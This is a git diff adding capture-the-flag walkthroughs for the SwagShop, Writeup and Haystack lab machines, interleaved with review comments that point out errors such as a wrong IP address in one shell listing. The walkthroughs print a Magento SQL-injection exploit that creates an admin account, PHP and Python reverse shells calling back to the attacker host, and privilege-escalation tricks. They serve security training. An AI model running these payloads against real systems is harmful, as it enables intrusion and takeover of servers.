+ Magento eCommerce - Remote Code Exec | exploits/xml/webapps/37977.py
+ eBay Magento 1.9.2.1 - PHP FPM XML e | exploits/php/webapps/38573.txt
+ eBay Magento CE 1.9.2.1 - Unrestrict | exploits/php/webapps/38651.txt
+ ------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Let's first locate the python script n° 37977 which could possibly give us the ability to execute remote code onto the webserver.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → locate 37977.py
+ /usr/share/exploitdb/exploits/xml/webapps/37977.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → cp /usr/share/exploitdb/exploits/xml/webapps/37977.py .
+
+
+Now that's saved locally, we'll continue searching a bit before coming back to it. Meanwhile our dirsearch scan returned with a few results for us :
+
+
+ [13:07:33] 301 - 309B - /js -> http://10.10.10.140/js/
+ [13:07:53] 301 - 310B - /app -> http://10.10.10.140/app/
+ [13:07:54] 200 - 5KB - /app/etc/config.xml
+ [13:07:54] 200 - 2KB - /app/etc/local.xml
+ [13:07:54] 200 - 9KB - /app/etc/local.xml.additional
+ [13:07:54] 200 - 2KB - /app/etc/local.xml.template
+ [13:08:01] 200 - 717B - /cron.sh
+ [13:08:01] 200 - 0B - /cron.php
+ [13:08:04] 301 - 313B - /errors -> http://10.10.10.140/errors/
+ [13:08:04] 200 - 2KB - /errors/
+ [13:08:05] 200 - 1KB - /favicon.ico
+ [13:08:09] 200 - 946B - /includes/
+ [13:08:09] 301 - 315B - /includes -> http://10.10.10.140/includes/
+ [13:08:09] 200 - 16KB - /index.php
+ [13:08:10] 200 - 44B - /install.php
+ [13:08:11] 301 - 318B - /js/tiny_mce -> http://10.10.10.140/js/tiny_mce/
+ [13:08:11] 200 - 4KB - /js/tiny_mce/
+ [13:08:11] 301 - 310B - /lib -> http://10.10.10.140/lib/
+ [13:08:11] 200 - 10KB - /LICENSE.txt
+ [13:08:14] 301 - 312B - /media -> http://10.10.10.140/media/
+ [13:08:18] 200 - 886B - /php.ini.sample
+ [13:08:20] 301 - 314B - /pkginfo -> http://10.10.10.140/pkginfo/
+ [13:08:23] 200 - 571KB - /RELEASE_NOTES.txt
+ [13:08:24] 301 - 312B - /shell -> http://10.10.10.140/shell/
+ [13:08:24] 200 - 2KB - /shell/
+ [13:08:26] 301 - 311B - /skin -> http://10.10.10.140/skin/
+ [13:08:31] 200 - 755B - /var/backups/
+ [13:08:31] 301 - 310B - /var -> http://10.10.10.140/var/
+ [13:08:31] 200 - 4KB - /var/cache/
+
+
+Seems like our dirsearch scan came back with a few interesting directories for us to inspect. Let's use a web browser of our choice to inspect the /app directory. For this example we'll use lynx.
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → lynx http://10.10.10.140/app/
+
+
+
+
+
+Seems like we can list it's contents ! Let's navigate into etc.
+
+
+
+Locale.xml seems juicy.
+
+
+ Wed, 08 May 2019 07:23:09 +0000 b355a9e0cd018d3f7f03607141518419
+ false localhost root fMVWh7bDHpgZkyfqQXreTjU9 swagshop SET NAMES utf8
+ mysql4 pdo_mysql 1 files admin
+
+
+And we have credentials ! although the password seems to be encrypted. Let's return to our python script n°37977 and see if we are able to execute it in either python1, 2 or 3.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python3 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+
+Looking at the results, we see that the script has been badly written so we will re-write it.
+
+
+ 37977.py
+ import requests
+ import base64
+ import sys
+
+ target = "http://10.10.10.140/"
+
+ if not target.startswith("http"):
+ target = "http://" + target
+
+ if target.endswith("/"):
+ target = target[:-1]
+
+ target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
+
+ q="""
+ SET @SALT = 'rp';
+ SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+ SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+ INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+ INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+ """
+
+
+ query = q.replace("\n", "").format(username="forme", password="forme")
+ pfilter = "popularity[from]=0&popularity;[to]=3&popularity;[field_expr]=0);{0}".format(query)
+
+ # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+ r = requests.post(target_url,
+ data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+ "filter": base64.b64encode(pfilter),
+ "forwarded": 1})
+ if r.ok:
+ print "WORKED"
+ print "Check {0}/admin with creds forme:forme".format(target)
+ else:
+ print "DID NOT WORK"
+
+
+Now that the script has been re-written, we try to launch it in the same way we tried before.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python 37977.py
+ File "37977.py", line 33
+ print "WORKED"
+ ^
+ SyntaxError: Missing parentheses in call to 'print'. Did you mean print("WORKED")?
+
+
+Let's not forget that this script is a bit old and has got it's print statements without any parentheses so we will use python2 to launch it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ DID NOT WORK
+
+
+Out of luck ! That's because it's not the correct url. we need to replace the URL at the top with "http://10.10.10.140/index.php/"
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → nano 37977.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ WORKED
+ Check http://10.10.10.140/index.php/admin with creds forme:forme
+
+
+
+And it worked ! let's check out the login page with the credentials forme:forme.
+
+ 
+
+We have been able to log in ! Now looking back at our searchsploit results we see yet another python script that looks intersting, let's copy it into our current directory.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/SwagShop]
+ → nano nihilist.jpg
+
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.10/1234 0>&1'");
+ ?****>
+
+
+
+next we go to newsletter > newsletter templates > add new template and do the following :
+
+
+
+next we go to System > configuration > developer > template settings > allow symlinks and therefore we should be able to preview our template which will browse to the php reverse shell hidden in the thumbnail jpg named nihilist.jpg, which should send the incoming shell connection to our netcat listener on port 1234
+
+
+ λ nihilist [ 10.10.14.10/23 ] [/usr/share]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.140] 53234
+ bash: cannot set terminal process group (1292): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@swagshop:/var/www/html$ cd /home && ls
+ haris
+ www-data@swagshop:/home$ cd haris
+ cd haris
+ www-data@swagshop:/home/haris$ cat user.txt
+ cat user.txt
+ a4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+we type sudo -l
+
+
+ www-data@swagshop:/home/haris$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on swagshop:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on swagshop:
+ (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+ www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/nihilist
+ sudo /usr/bin/vi /var/www/html/nihilist
+ Vim: Warning: Output is not to a terminal
+ Vim: Warning: Input is not from a terminal
+
+ E558: Terminal entry not found in terminfo
+ 'unknown' not known. Available builtin terminals are:
+ builtin_amiga
+ builtin_beos-ansi
+ builtin_ansi
+ builtin_pcansi
+ builtin_win32
+ builtin_vt320
+ builtin_vt52
+ builtin_xterm
+ builtin_iris-ansi
+ builtin_debug
+ builtin_dumb
+ defaulting to 'ansi'
+
+
+ :!/bin/bash
+ whoami
+ root
+ cat /root/root.txt
+ c2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ ___ ___
+ /| |/|\| |\
+ /_| ´ |.` |_\ We are open! (Almost)
+ | |. |
+ | |. | Join the beta HTB Swag Store!
+ |___|.__| https://hackthebox.store/password
+
+ PS: Use root flag as password!
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
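Review bot: the HTML and PHP snippets in this file were mangled by the Markdown escaping: `<****address class="copyright">`, `<**/address>`, `<****?php` and `?****>` are not what curl printed or what was typed into nihilist.jpg, so put those lines in fenced code blocks and restore the literal `<address>`, `</address>`, `<?php` and `?>`. The local.xml dump has the same problem in reverse, having lost its element names and collapsed into one run of values (`false localhost root fMVWh7bDHpgZkyfqQXreTjU9 swagshop ...`); as shown it does not support "the password seems to be encrypted", because the reader cannot tell which value is the database password and which is the crypt key. The script listing under "we will re-write it" still reads `target = "http://10.10.10.140/"` although the text later says the URL had to become `http://10.10.10.140/index.php/` before it worked, so show the final version once; also check `&popularity;[to]=3&popularity;[field_expr]=0` for the stray `;` after each `popularity`, which looks like an HTML-entity artifact rather than part of the filter. "let's copy it into our current directory" is followed by `nano nihilist.jpg`, not by a copy of the second searchsploit entry (38651 is a `.txt` advisory, not a python script), so say what that advisory describes and why a jpg containing PHP is being created. The empty image link `` and the blank runs after the lynx commands point to screenshots that were not committed. On the root step, one sentence naming the root cause would serve defenders: the sudoers rule `(root) NOPASSWD: /usr/bin/vi /var/www/html/*` grants www-data an interactive editor, and any editor that can spawn a shell makes the path restriction meaningless.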
diff --git a/Easy/33.md b/Easy/33.md
new file mode 100644
index 0000000..c07b50f
--- /dev/null
+++ b/Easy/33.md
@@ -0,0 +1,329 @@
+# Writeup Writeup
+
+
+
+## Introduction :
+
+Writeup is an easy Linux box that was released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nmap -F 10.10.10.138
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT
+ Nmap scan report for writeup.htb (10.10.10.138)
+ Host is up (0.098s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.30 seconds
+
+
+Looks like we have 2 ports opened, let's investigate the 80th port.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nmap -sCV -p80 10.10.10.138
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT
+ Nmap scan report for writeup.htb (10.10.10.138)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ | http-robots.txt: 1 disallowed entry
+ |_/writeup/
+ |_http-title: Nothing here yet.
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
+
+
+let's add writeup.htb to our /etc/hosts
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → echo '10.10.10.138 writeup.htb' >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Taking a first glance at the webpage on port 80, we use the curl command with the -sk flags.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://writeup.htb/
+
+ ########################################################################
+ # #
+ # *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS *** #
+ # #
+ # Not yet live and already under attack. I found an ,~~--~~-. #
+ # Eeyore DoS protection script that is in place and + | |\ #
+ # watches for Apache 40x errors and bans bad IPs. || |~ |`,/-\ #
+ # Hope you do not get hit by false-positive drops! *\_) \_) `-' #
+ # #
+ # If you know where to download the proper Donkey DoS protection #
+ # please let me know via mail to jkr@writeup.htb - thanks! #
+ # #
+ ########################################################################
+
+ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+ 88888888888888888888888888888888888888888888888888888
+ 8888"""""""""""""""8888888888888888888888888888888888
+ 8888 8888888888888888888888888888888888
+ 8888 HTB NOTES 8888888888888888888888888888888888
+ 8888 888888888888888888888888888888888"
+ 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888":::::"88888888888888888888888
+ 888888888888888888888::;gPPRg;::888888888888888888888
+ 88888888888888888888::dP' `Yb::88888888888888888888
+ 88888888888888888888::8) (8::88888888888888888888
+ 88888888888888888888;:Yb dP:;88( )888888888888888
+ 888888888888888888888;:"8ggg8":;888888888888888888888
+ 88888888888888888888888aa:::aa88888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888"88888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 88888888888888888888888888a88888888888888888888888888
+ """""""""""""""""""' `"""""""""' `"""""""""""""""""""
+ (c) by Normand Veilleux
+
+
+ I am still searching through my backups so there is
+ nothing here yet. I am preparing go-live of my own
+ app.hackthebox.eu write-up page soon. Stay tuned!
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
+
+
+nothing too interesting there, apart from some information about "Apache 40x", let's run dirsearch to see which directories we can find.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-15_08-47-45.log
+
+ Target: http://writeup.htb/
+
+ [08:47:45] Starting:
+ 0.84% - Last request to: .bzr/README
+
+
+looks like this was a bad idea, the server seems to have blacklisted us. Instead we will use the nikto command.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nikto -h http://10.10.10.138/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.138
+ + Target Hostname: 10.10.10.138
+ + Target Port: 80
+ + Start Time: 2020-02-15 08:52:24 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.25 (Debian)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ + Scan terminated: 20 error(s) and 3 item(s) reported on remote host
+ + End Time: 2020-02-15 08:53:16 (GMT0) (52 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+
+nothing too interesting there, nikto seems to timeout on the host, let's check robots.txt
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://10.10.10.138/robots.txt
+ # __
+ # _(\ |@@|
+ # (__/\__ \--/ __
+ # \___|----| | __
+ # \ }{ /\ )_ / _\
+ # /\__/\ \__O (__
+ # (--/\--) \__/
+ # _)( )(_
+ # `---''---`
+
+ # Disallow access to the blog until content is finished.
+ User-agent: *
+ Disallow: /writeup/
+
+
+checking out http://10.10.10.138/writeup/ , we are greeted with some sort of a menu, let's look at it's source menu for anything fancy.
+
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://10.10.10.138/writeup/ | grep CMS
+ <****meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." /****>
+
+looks like we have a CMS Made Simple from 2004 ! let's run a quick searchsploit command to see which exploits are available for us
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → searchsploit CMS Made Simple | grep Injection
+ CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | exploits/php/webapps/29941.txt
+ CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | exploits/php/webapps/4810.txt
+ CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
+
+
+exploit number 46635.py looks interesting, let's locate it and paste it in our current folder.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → locate 46635.py
+ /usr/share/exploitdb/exploits/php/webapps/46635.py
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → cp /usr/share/exploitdb/exploits/php/webapps/46635.py .
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nano 46635.py
+
+
+Looking at the exploit we're going to use, we'll need to specify a few flags : -u for the URL --crack and -w for wordlist
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
+
+ [+] Salt for password found: 5a599ef579066807
+ [+] Username found: jkr
+ [+] Email found: jkr@writeup.htb
+ [+] Password found: 62def4866937f08cc13bab43bb14e6f7
+ [+] Password cracked: raykayjay9
+
+
+
+looks like our exploit worked ! we now have credentials to work with : jkr:raykayjay9 , let's try to get in using ssh.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → ssh jkr@writeup.htb
+ The authenticity of host 'writeup.htb (10.10.10.138)' can't be established.
+ ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts.
+ jkr@writeup.htb's password:
+ Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
+
+ The programs included with the Devuan GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ jkr@writeup:~$ uname -a
+ Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
+ jkr@writeup:~$ cat /home/jkr/user.txt
+
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+to escalate privileges to the root user, let's see what we can use to get a reverse shell onto the box
+
+
+ jkr@writeup:~$ which python
+ /usr/bin/python
+
+
+looks like we can use python to do so, let's ready our reverse shell in python
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → cat nihilist.py
+ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+
+
+_Terminal 3:_
+
+
+ jkr@writeup:~$ wget 10.10.14.10:8080/nihilist.py -O /usr/local/bin/run-parts
+ --2020-02-15 03:53:00-- http://10.10.14.10:8080/nihilist.py
+ Connecting to 10.10.14.10:8080... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 240 [text/plain]
+ Saving to: ‘/usr/local/bin/run-parts’
+
+ /usr/local/bin/run-parts 100%[===============================================>] 240 --.-KB/s in 0s
+
+ 2020-02-15 03:53:00 (52.9 MB/s) - ‘/usr/local/bin/run-parts’ saved [240/240]
+
+ jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
+
+
+
+Each time a user logs in, a process sets the PATH for that user and run-parts binary since we are part of the STAFF group, we can place our own run-parts binary in /usr/local/bin, cron will execute our own run-parts next time a new user logs in. And all that's left for us to do, is to log in another time as jkr, and it will activate our nihilist.py reverse shell and that way we will catch the incoming reverse shell connection through our second terminal.
+
+_Terminal 5:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → ssh jkr@10.10.10.138
+ jkr@10.10.10.138's password:
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.138] 57070
+ bash: cannot set terminal process group (2193): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@writeup:/# cat /root/root.txt
+ cat /root/root.txt
+
+ eeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
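Review bot: the reverse-shell file listed under Terminal 1 connects to `10.0.14.10`, but the attacking host is `10.10.14.10` everywhere else in this file and the listener in Terminal 2 reports `connect to [10.10.14.10]`, so the listing has a typo in the second octet and could not have produced the shown result as written; fix the IP in the listing. The heading `_Terminal 5:_` follows Terminals 1 to 3 and should read Terminal 4. The `dirsearch -u http://writeup.htb/ ...` command is pasted at the tail of the curl block (just before "nothing too interesting there") and again where it is actually run, so drop the first copy; the two lines `git clone https://github.com/maurosoria/dirsearch.git` and `dirsearch -u -e -t 50 -x 500` inside the dirsearch output are not program output and should be removed. In the privilege-escalation paragraph, the claim that the user "is part of the STAFF group" is not evidenced anywhere in the hunk (no `id` output), and the paragraph first says the trigger is a login and then says "cron will execute our own run-parts"; the transcript itself (the shell arrives immediately after the second `ssh jkr@10.10.10.138`) supports the login-triggered explanation, so show the `id` output, drop the cron reference, and split that run-on into two or three sentences. The root cause worth stating for defenders is that a non-root user could write into /usr/local/bin, a directory on the PATH of a privileged process.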
diff --git a/Easy/34.md b/Easy/34.md
new file mode 100644
index 0000000..b6fb959
--- /dev/null
+++ b/Easy/34.md
@@ -0,0 +1,585 @@
+# Haystack Writeup
+
+
+
+## Haystack Introduction :
+
+Haystack is an easy Linux box that was released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nmap -F 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:05 GMT
+ Nmap scan report for 10.10.10.115
+ Host is up (0.81s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nmap -sCV -p22,80 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:06 GMT
+ Nmap scan report for 10.10.10.115
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
+ | 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
+ |_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
+ 80/tcp open http nginx 1.12.2
+ |_http-server-header: nginx/1.12.2
+ |_http-title: Site doesn't have a title (text/html).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
+
+
+Let's add haystack.htb to our /etc/hosts file.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "10.10.10.115 haystack.htb" >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Let's see which directories we can find on the 80th port : using the dirsearch command.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-15_10-10-36.log
+
+ Target: http://10.10.10.115/
+
+ [10:10:37] Starting:
+ [10:10:39] 400 - 173B - /%2e%2e/google.com
+ [10:10:55] 200 - 55B - /index.md
+
+ Task Completed
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nikto -h http://haystack.htb/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.115
+ + Target Hostname: haystack.htb
+ + Target Port: 80
+ + Start Time: 2020-02-15 10:11:20 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: nginx/1.12.2
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)/
+
+
+
+Not much to see on that port from either dirsearch nor nikto, let's poke around the box a little further
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb/robots.txt | grep nginx
+ <****hr> <****center>nginx/1.12.2 <****/center>
+
+looks like we have nginx 1.12.2 running on this machine, just like how our nmap scan suggested. on index.html of port 80, we find a jpg file named needle, we download it locally and examine it with exiftool.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → wget http://haystack.htb/needle.jpg
+ --2020-02-15 10:18:22-- http://haystack.htb/needle.jpg
+ Resolving haystack.htb (haystack.htb)... 10.10.10.115
+ Connecting to haystack.htb (haystack.htb)|10.10.10.115|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 182982 (179K) [image/jpeg]
+ Saving to: ‘needle.jpg’
+
+ needle.jpg 100%[===============================================>] 178.69K 155KB/s in 1.2s
+
+ 2020-02-15 10:18:24 (155 KB/s) - ‘needle.jpg’ saved [182982/182982]
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → exiftool needle.jpg
+ ExifTool Version Number : 11.86
+ File Name : needle.jpg
+ Directory : .
+ File Size : 179 kB
+ File Modification Date/Time : 2019:01:25 23:37:55+00:00
+ File Access Date/Time : 2020:02:15 10:18:49+00:00
+ File Inode Change Date/Time : 2020:02:15 10:18:24+00:00
+ File Permissions : rw-r--r--
+ File Type : JPEG
+ File Type Extension : jpg
+ MIME Type : image/jpeg
+ JFIF Version : 1.01
+ Exif Byte Order : Big-endian (Motorola, MM)
+ X Resolution : 96
+ Y Resolution : 96
+ Resolution Unit : inches
+ Software : paint.net 4.1.1
+ User Comment : CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90.
+ Image Width : 1200
+ Image Height : 803
+ Encoding Process : Baseline DCT, Huffman coding
+ Bits Per Sample : 8
+ Color Components : 3
+ Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
+ Image Size : 1200x803
+ Megapixels : 0.964
+
+
+
+not so many useful infos there, let's run the strings command aswell
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → strings needle.jpg
+
+ [...]
+ STW5
+ *Oo!;.o|?>
+ .n2FrZ
+ rrNMz
+ #=pMr
+ BN2I
+ ,'*'
+ I$f2/<****-iy
+ bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==
+
+looks like a base64 string right at the end, let's decrypt it using base64 -d
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
